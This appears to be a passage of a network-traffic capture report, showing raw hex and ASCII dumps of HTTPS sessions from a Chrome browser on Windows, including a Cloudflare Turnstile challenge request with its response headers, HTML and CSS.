                                    2024-05-22 15:09:00 UTC702INData Raw: 6b 35 61 31 6a 33 6d 64 65 4c 71 6a 74 34 32 34 72 37 4b 44 76 34 4b 42 79 4b 47 34 6e 71 61 6c 76 4b 4b 78 6b 63 65 6d 31 38 53 36 79 4c 43 50 32 4b 6a 4d 79 63 4f 64 31 2b 54 4f 70 74 4c 54 74 73 69 6b 75 2b 61 73 36 64 72 6f 36 38 4c 64 30 4f 44 72 78 39 6e 6f 74 72 4f 30 32 4e 66 38 31 76 66 57 74 39 72 44 30 4e 33 58 2b 65 73 42 32 76 33 4c 37 39 37 62 39 4f 49 4b 7a 2f 49 55 35 2f 76 79 37 77 34 55 37 76 73 54 41 75 48 32 46 67 66 68 2b 42 77 4d 36 42 6b 66 41 41 63 42 4a 42 51 6c 44 43 51 5a 45 76 6b 6f 4b 67 59 4a 4f 78 6b 53 2b 44 45 34 4f 45 41 77 42 67 41 66 2f 41 63 64 50 45 73 6a 50 51 39 49 54 55 6b 52 54 52 55 6a 54 79 78 4d 57 6a 55 65 50 6c 42 5a 52 42 30 68 5a 31 51 32 4a 53 68 4b 61 54 70 68 50 54 6c 62 52 55 4a 64 4d 6b 4a 33 4e 32 51
                                    Data Ascii: k5a1j3mdeLqjt424r7KDv4KByKG4nqalvKKxkcem18S6yLCP2KjMycOd1+TOptLTtsiku+as6dro68Ld0ODrx9notrO02Nf81vfWt9rD0N3X+esB2v3L797b9OIKz/IU5/vy7w4U7vsTAuH2Fgfh+BwM6BkfAAcBJBQlDCQZEvkoKgYJOxkS+DE4OEAwBgAf/AcdPEsjPQ9ITUkRTRUjTyxMWjUePlBZRB0hZ1Q2JShKaTphPTlbRUJdMkJ3N2Q
                                    2024-05-22 15:09:00 UTC1369INData Raw: 72 41 6f 6f 65 35 76 62 37 50 6e 5a 47 76 71 61 72 4e 73 4d 6d 34 6f 39 62 53 78 70 66 53 34 4e 76 55 76 61 48 57 75 75 4b 37 6f 4b 71 6d 35 74 76 59 77 4d 58 76 73 36 75 78 34 72 58 6e 74 73 66 57 30 39 33 39 31 73 7a 65 76 66 30 41 76 39 59 45 33 74 6e 6d 35 2f 7a 6b 45 4d 72 6c 34 51 54 6c 41 64 34 42 30 52 50 6d 36 41 37 59 38 2f 4d 55 34 42 37 77 48 51 41 62 46 4f 44 6d 41 66 6e 6c 43 76 66 36 41 43 49 4f 44 67 77 75 49 6a 41 68 49 79 6b 52 4b 53 33 30 4c 76 7a 33 44 78 41 79 52 53 63 6e 4e 50 34 35 2f 43 78 49 54 53 6c 49 51 69 55 4e 45 44 49 75 4b 52 42 4e 54 6c 59 78 48 42 73 6e 4b 44 63 34 57 44 59 65 4d 57 46 6b 61 55 74 4c 4a 31 6c 58 4c 54 68 52 58 47 5a 53 54 45 78 30 5a 30 31 6d 55 6e 5a 49 62 7a 39 50 56 54 68 30 66 45 52 52 66 58 74 69 59
                                    Data Ascii: rAooe5vb7PnZGvqarNsMm4o9bSxpfS4NvUvaHWuuK7oKqm5tvYwMXvs6ux4rXntsfW09391szevf0Av9YE3tnm5/zkEMrl4QTlAd4B0RPm6A7Y8/MU4B7wHQAbFODmAfnlCvf6ACIODgwuIjAhIykRKS30Lvz3DxAyRScnNP45/CxITSlIQiUNEDIuKRBNTlYxHBsnKDc4WDYeMWFkaUtLJ1lXLThRXGZSTEx0Z01mUnZIbz9PVTh0fERRfXtiY
                                    2024-05-22 15:09:00 UTC1369INData Raw: 46 69 34 33 4f 72 62 50 54 30 61 57 58 72 61 6e 4d 79 4a 32 53 76 72 72 4e 74 35 37 53 33 74 66 66 75 36 4b 34 71 2b 44 75 77 73 33 77 37 61 2f 65 34 2f 50 70 78 4f 62 77 39 76 62 51 39 50 76 54 76 2f 37 38 31 2f 6f 4a 41 67 4c 2b 2f 4f 33 31 35 41 55 4a 34 38 38 4c 44 65 66 50 42 78 49 53 44 78 45 56 37 51 6a 75 45 41 33 62 47 50 6f 67 4a 78 55 65 2b 68 6b 6b 39 66 34 44 4c 53 38 68 38 41 67 74 4b 67 51 6e 37 78 51 58 44 78 33 33 4e 53 37 35 39 78 30 50 4d 68 59 51 52 6a 51 63 47 69 6b 63 47 30 74 47 42 79 55 4f 54 43 59 77 4b 7a 51 6a 53 68 59 35 4f 44 6f 33 46 30 49 77 4c 42 6f 67 54 6d 5a 48 5a 79 4a 66 58 6b 4a 4c 61 6d 78 51 52 79 6f 79 63 6b 39 72 52 57 6c 4b 54 7a 4a 33 57 6a 45 2f 56 30 41 39 63 48 42 41 5a 49 4a 31 61 49 70 37 65 55 6d 4b 69 6e
                                    Data Ascii: Fi43OrbPT0aWXranMyJ2SvrrNt57S3tffu6K4q+Duws3w7a/e4/PpxObw9vbQ9PvTv/781/oJAgL+/O315AUJ488LDefPBxISDxEV7QjuEA3bGPogJxUe+hkk9f4DLS8h8AgtKgQn7xQXDx33NS759x0PMhYQRjQcGikcG0tGByUOTCYwKzQjShY5ODo3F0IwLBogTmZHZyJfXkJLamxQRyoyck9rRWlKTzJ3WjE/V0A9cHBAZIJ1aIp7eUmKin
                                    2024-05-22 15:09:00 UTC1369INData Raw: 72 4b 71 35 32 5a 69 54 74 5a 62 63 77 5a 2f 54 30 4d 48 47 77 73 54 69 34 39 2f 59 78 62 75 6f 72 75 66 50 77 63 37 4e 79 73 4c 4d 72 39 76 58 39 72 62 4c 36 50 32 35 38 2f 50 79 33 77 66 32 2f 51 4c 6b 39 74 33 74 79 41 67 4f 41 4f 72 69 33 65 73 48 35 68 6e 69 32 68 4c 4f 43 74 54 72 44 50 6e 78 38 4e 6f 41 45 42 54 6e 36 42 55 4c 2b 77 51 4a 44 41 7a 72 2f 53 34 66 4d 78 4d 31 44 78 6e 30 43 6a 41 55 4a 30 41 51 4d 51 49 50 4c 7a 46 48 4a 45 51 43 2f 44 73 36 52 45 67 6b 49 77 30 66 4a 53 46 44 4c 7a 51 33 4f 52 6f 56 58 44 51 66 54 55 31 58 57 6c 46 53 4e 55 67 67 53 54 67 34 4b 6c 68 69 50 47 6c 6d 55 47 35 68 56 55 56 59 5a 31 6c 4a 57 48 4e 6f 63 6b 78 74 59 56 55 2b 67 55 4e 6e 5a 46 36 48 65 32 5a 72 62 6c 79 50 65 48 4a 67 6b 49 6d 4a 62 58 39
                                    Data Ascii: rKq52ZiTtZbcwZ/T0MHGwsTi49/YxbuorufPwc7NysLMr9vX9rbL6P258/Py3wf2/QLk9t3tyAgOAOri3esH5hni2hLOCtTrDPnx8NoAEBTn6BUL+wQJDAzr/S4fMxM1Dxn0CjAUJ0AQMQIPLzFHJEQC/Ds6REgkIw0fJSFDLzQ3ORoVXDQfTU1XWlFSNUggSTg4KlhiPGlmUG5hVUVYZ1lJWHNockxtYVU+gUNnZF6He2ZrblyPeHJgkImJbX9
                                    2024-05-22 15:09:00 UTC1369INData Raw: 37 66 53 79 5a 53 68 75 4e 2f 58 31 4e 6e 4b 78 4c 6a 4d 71 62 7a 73 38 4f 33 6b 37 4b 32 39 36 75 44 71 74 75 72 70 2b 75 6e 4c 34 4d 6e 35 34 4d 45 45 32 65 49 49 76 37 2f 59 43 67 66 4c 33 51 7a 74 42 2b 67 52 39 4f 50 2b 45 67 55 50 36 41 73 49 37 43 44 52 2b 76 34 4e 46 65 41 46 33 53 62 2b 4b 66 59 47 41 79 73 41 44 53 4c 78 42 44 49 69 42 54 54 33 4d 43 77 50 4b 67 30 4b 2f 53 34 42 4d 42 67 63 45 42 55 78 51 44 30 6f 53 42 59 39 52 51 6c 45 49 77 67 53 49 46 42 4a 4e 46 51 54 52 7a 59 62 44 31 6f 75 46 30 30 61 54 32 4d 2b 5a 46 39 6b 55 56 67 36 50 6b 6f 6d 4f 7a 6c 62 63 55 77 74 61 6b 73 74 52 55 34 78 53 33 52 50 56 32 70 78 63 44 39 51 54 32 52 62 66 58 4e 34 51 49 68 4d 57 6e 75 47 62 59 46 78 5a 32 4b 4c 55 5a 42 30 68 49 6d 4a 61 56 64 2f
                                    Data Ascii: 7fSyZShuN/X1NnKxLjMqbzs8O3k7K296uDqturp+unL4Mn54MEE2eIIv7/YCgfL3QztB+gR9OP+EgUP6AsI7CDR+v4NFeAF3Sb+KfYGAysADSLxBDIiBTT3MCwPKg0K/S4BMBgcEBUxQD0oSBY9RQlEIwgSIFBJNFQTRzYbD1ouF00aT2M+ZF9kUVg6PkomOzlbcUwtakstRU4xS3RPV2pxcD9QT2RbfXN4QIhMWnuGbYFxZ2KLUZB0hImJaVd/
                                    2024-05-22 15:09:00 UTC1369INData Raw: 66 45 35 2b 48 53 79 2b 66 6b 76 2b 71 73 36 4e 6e 6d 72 4f 79 77 73 4d 50 72 39 65 37 73 7a 2f 54 6f 76 4d 76 36 76 50 76 66 34 76 37 6e 41 74 62 53 43 4e 62 6c 33 66 76 4a 42 2f 49 4a 43 4f 66 56 41 67 34 51 39 4f 6a 74 39 64 62 78 43 51 45 4e 42 50 41 45 44 2b 48 31 46 53 77 68 36 42 63 42 47 41 6f 6b 4d 7a 45 45 42 76 4d 5a 42 7a 67 6d 4d 68 6b 35 45 68 6e 33 46 6b 51 62 2b 30 41 6d 47 6b 63 71 51 43 63 45 49 51 6b 6d 55 6b 77 69 4c 42 4d 6d 50 30 6f 33 4a 30 39 4c 4f 6c 4e 67 57 78 63 34 47 55 38 66 50 32 67 69 49 31 5a 47 52 7a 70 4b 4f 6d 55 74 5a 69 70 4c 63 58 64 58 4e 45 39 6a 64 58 31 39 55 7a 39 39 61 6e 55 37 63 57 56 6c 55 6c 70 48 5a 45 46 59 56 34 56 37 54 57 68 61 62 31 52 53 6a 57 4a 6f 67 6c 53 57 6b 57 64 76 58 70 56 2f 62 6f 32 6a 67
                                    Data Ascii: fE5+HSy+fkv+qs6NnmrOywsMPr9e7sz/TovMv6vPvf4v7nAtbSCNbl3fvJB/IJCOfVAg4Q9Ojt9dbxCQENBPAED+H1FSwh6BcBGAokMzEEBvMZBzgmMhk5Ehn3FkQb+0AmGkcqQCcEIQkmUkwiLBMmP0o3J09LOlNgWxc4GU8fP2giI1ZGRzpKOmUtZipLcXdXNE9jdX19Uz99anU7cWVlUlpHZEFYV4V7TWhab1RSjWJoglSWkWdvXpV/bo2jg
                                    2024-05-22 15:09:00 UTC1369INData Raw: 6e 79 62 33 6b 33 39 6d 6f 35 73 79 39 35 4f 6a 71 75 4c 4b 33 35 2f 50 4a 37 41 48 4f 37 64 58 63 76 50 6e 5a 35 63 6a 59 35 4d 7a 49 33 64 66 62 33 63 54 4e 30 76 50 6a 43 76 63 43 2b 50 55 52 45 68 72 32 33 39 37 71 44 66 72 37 48 50 34 54 45 75 55 43 2f 53 4d 61 45 41 73 6f 45 51 44 30 37 52 41 34 44 44 73 44 4f 42 41 39 4b 2f 6f 74 4f 6a 63 31 51 67 45 41 4a 76 34 55 50 30 67 59 47 42 35 48 43 31 45 77 52 69 38 57 51 45 4a 56 56 46 77 39 55 52 41 39 54 45 45 68 59 45 38 64 4e 56 46 64 58 54 78 42 49 32 56 65 4b 47 42 68 52 55 6b 79 4c 6b 31 6d 51 44 52 6b 54 6c 52 64 4e 31 39 5a 58 48 64 4c 67 33 52 38 65 47 6c 7a 5a 48 69 46 67 58 75 48 61 45 2b 49 68 59 56 4d 66 6f 68 67 6c 6c 52 6e 68 31 6c 61 62 31 70 73 6e 6d 78 32 6e 6e 6c 39 65 32 68 2f 69 36
                                    Data Ascii: nyb3k39mo5sy95OjquLK35/PJ7AHO7dXcvPnZ5cjY5MzI3dfb3cTN0vPjCvcC+PUREhr2397qDfr7HP4TEuUC/SMaEAsoEQD07RA4DDsDOBA9K/otOjc1QgEAJv4UP0gYGB5HC1EwRi8WQEJVVFw9URA9TEEhYE8dNVFdXTxBI2VeKGBhRUkyLk1mQDRkTlRdN19ZXHdLg3R8eGlzZHiFgXuHaE+IhYVMfohgllRnh1lab1psnmx2nnl9e2h/i6
                                    2024-05-22 15:09:00 UTC1369INData Raw: 7a 4c 54 4c 74 4b 6e 55 39 72 6e 4c 72 74 57 30 39 63 72 30 41 64 65 36 78 63 48 61 78 67 63 4d 43 4f 66 45 78 4d 62 5a 45 42 41 43 30 77 48 4d 30 39 59 59 35 52 6a 6f 31 66 55 62 32 74 4d 69 2f 65 4c 6c 33 42 76 6c 46 77 59 71 36 66 6f 4b 4c 51 30 4c 43 69 44 38 2f 52 4d 4c 36 75 38 54 44 50 77 48 51 44 33 2b 4c 78 49 36 44 55 45 43 48 78 4d 33 46 6b 6f 4d 4a 6b 55 63 4c 56 45 71 51 42 51 6a 4c 6b 4d 30 45 44 4d 75 4a 6c 31 63 55 78 74 56 5a 47 51 6b 4d 30 4a 57 52 6b 45 7a 56 6b 78 46 50 7a 67 72 5a 44 4e 4e 4e 45 4e 4c 53 30 4e 43 54 46 64 5a 56 56 70 34 54 32 39 34 63 6b 52 6a 58 6a 34 37 51 45 47 46 53 48 6c 4e 69 31 74 66 61 33 35 64 61 31 57 58 5a 56 42 61 62 46 31 6d 58 5a 35 71 6f 4a 31 2b 59 5a 4f 6b 58 34 56 63 69 70 6c 6f 6d 71 69 75 62 36 43
                                    Data Ascii: zLTLtKnU9rnLrtW09cr0Ade6xcHaxgcMCOfExMbZEBAC0wHM09YY5Rjo1fUb2tMi/eLl3BvlFwYq6foKLQ0LCiD8/RML6u8TDPwHQD3+LxI6DUECHxM3FkoMJkUcLVEqQBQjLkM0EDMuJl1cUxtVZGQkM0JWRkEzVkxFPzgrZDNNNENLS0NCTFdZVVp4T294ckRjXj47QEGFSHlNi1tfa35da1WXZVBabF1mXZ5qoJ1+YZOkX4Vciplomqiub6C
                                    2024-05-22 15:09:00 UTC1369INData Raw: 63 71 78 2b 38 2f 76 32 72 72 57 31 65 50 35 41 4e 2f 56 35 51 4c 4a 35 50 7a 75 42 39 34 44 43 4d 2f 75 43 41 77 4c 41 4f 59 59 44 68 4c 31 43 51 2f 58 47 2f 4d 4c 32 68 63 4f 2b 4e 34 6d 46 4f 4d 47 49 51 6f 49 4d 50 30 62 45 50 34 4f 41 53 6f 5a 45 41 58 32 44 68 4d 49 47 77 41 66 48 7a 49 4e 46 68 46 44 52 78 4d 39 42 76 30 46 53 45 77 34 54 7a 73 4e 4a 30 74 41 50 77 70 5a 47 54 70 47 57 52 78 48 55 6a 74 51 50 46 31 44 58 46 67 30 5a 6c 52 58 4f 6d 78 43 4f 6b 4a 68 52 6b 35 46 63 33 42 57 52 58 5a 30 61 45 52 36 64 47 68 5a 67 47 78 57 57 59 4a 46 65 47 4f 49 67 48 6c 43 62 6d 5a 71 57 47 74 64 59 34 64 71 68 32 68 33 64 32 5a 38 66 57 35 36 66 49 42 79 6a 33 39 67 67 46 36 41 69 49 65 62 6f 6f 68 2b 5a 48 74 6f 68 70 2b 75 68 33 57 32 6f 58 4b 51
                                    Data Ascii: cqx+8/v2rrW1eP5AN/V5QLJ5PzuB94DCM/uCAwLAOYYDhL1CQ/XG/ML2hcO+N4mFOMGIQoIMP0bEP4OASoZEAX2DhMIGwAfHzINFhFDRxM9Bv0FSEw4TzsNJ0tAPwpZGTpGWRxHUjtQPF1DXFg0ZlRXOmxCOkJhRk5Fc3BWRXZ0aER6dGhZgGxWWYJFeGOIgHlCbmZqWGtdY4dqh2h3d2Z8fW56fIByj39ggF6AiIebooh+ZHtohp+uh3W2oXKQ


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.449779104.17.2.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:01 UTC754OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/9c7p6/0x4AAAAAAADnPIDROrmt1Wwj/light/normal HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    Upgrade-Insecure-Requests: 1
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: navigate
                                    Sec-Fetch-Dest: iframe
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:01 UTC1362INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:01 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Content-Length: 79387
                                    Connection: close
                                    origin-agent-cluster: ?1
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    cross-origin-embedder-policy: require-corp
                                    cross-origin-resource-policy: cross-origin
                                    document-policy: js-profiling
                                    content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                    cross-origin-opener-policy: same-origin
                                    referrer-policy: same-origin
                                    2024-05-22 15:09:01 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 38 37 64 62 39 39 36 32 39 34 34 37 38 65 31 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                    Data Ascii: Server: cloudflareCF-RAY: 887db996294478e1-EWRalt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:01 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                    Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                    2024-05-22 15:09:01 UTC1369INData Raw: 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 7d 0a 0a 62 6f 64 79 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 37 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20
                                    Data Ascii: 00%; height: 100%; overflow: hidden;}body { margin: 0; background-color: #fff; padding: 0; width: 100%; height: 100%; overflow: hidden; line-height: 17px; color: #1d1f20; font-family: -apple-system, system-ui, blinkmacsystemfont,
                                    2024-05-22 15:09:01 UTC1369INData Raw: 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 38 70 78 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 33 30 70 78 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 2d 75 70 2d 63 65 6e 74 65 72 20 30 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 38 35 2c 20 30 2e 36 38 2c 20 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20
                                    Data Ascii: miterlimit: 10;}#success-icon { display: flex; margin-right: 8px; border-radius: 50%; box-shadow: inset 0 0 0 #038127; width: 30px; height: 30px; animation: scale-up-center 0.6s cubic-bezier(0.55, 0.085, 0.68, 0.53) both; stroke-width:
                                    2024-05-22 15:09:01 UTC1369INData Raw: 61 3a 66 6f 63 75 73 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 34 39 34 39 34 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 62 2d 6c 62 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 64 61 64 61 64 61 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b
                                    Data Ascii: a:focus,.theme-dark #challenge-error-text a:hover,.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus { color: #949494;}.theme-dark .cb-lb .cb-i { border: 2px solid #dadada; background-color: #222;}.theme-dark
                                    2024-05-22 15:09:01 UTC1369INData Raw: 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 36 36 36 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 71 72 20 7b 0a 20 20 66 69 6c 6c 3a 20 72 67 62 28 32 34 33 2c 20 31 32 38 2c 20 33 32 29 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 20 7b 0a 20 20 66 69 6c 6c 3a 20 23 66 66 66 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c
                                    Data Ascii: border-color: #666; background-color: #222;}.theme-dark #qr { fill: rgb(243, 128, 32);}.theme-dark .logo-text { fill: #fff;}.theme-dark #fr-helper-link,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited,
                                    2024-05-22 15:09:01 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 23 66 61 66 61 66 61 3b 0a 7d 0a 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 7b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 64 65 31 33 30 33 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 70 78 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 64 31 66 32 30 3b 0a 7d 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76
                                    Data Ascii: color: #fafafa;}#challenge-overlay,#challenge-error-text { text-align: center; line-height: 10px; color: #de1303; font-size: 9px;}#challenge-overlay a,#challenge-error-text a { color: #1d1f20;}#challenge-overlay a:visited, #challenge-ov
                                    2024-05-22 15:09:01 UTC1369INData Raw: 74 3a 61 63 74 69 76 65 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 63 34 34 64 30 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 73 70 61 6e 2e 63 62 2d 6c 62 2d 74 20 7b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 2e 63 62 2d 6c 62 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 63 62 2d 69 20 7b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 20 73 63 61 6c 65 28 31 29 3b 0a 20 20
                                    Data Ascii: t:active ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:focus ~ .cb-i { border: 2px solid #c44d0e;}.cb-lb input:focus ~ span.cb-lb-t { text-decoration: underline;}.cb-lb input:checked ~ .cb-i { transform: rotate(0deg) scale(1);
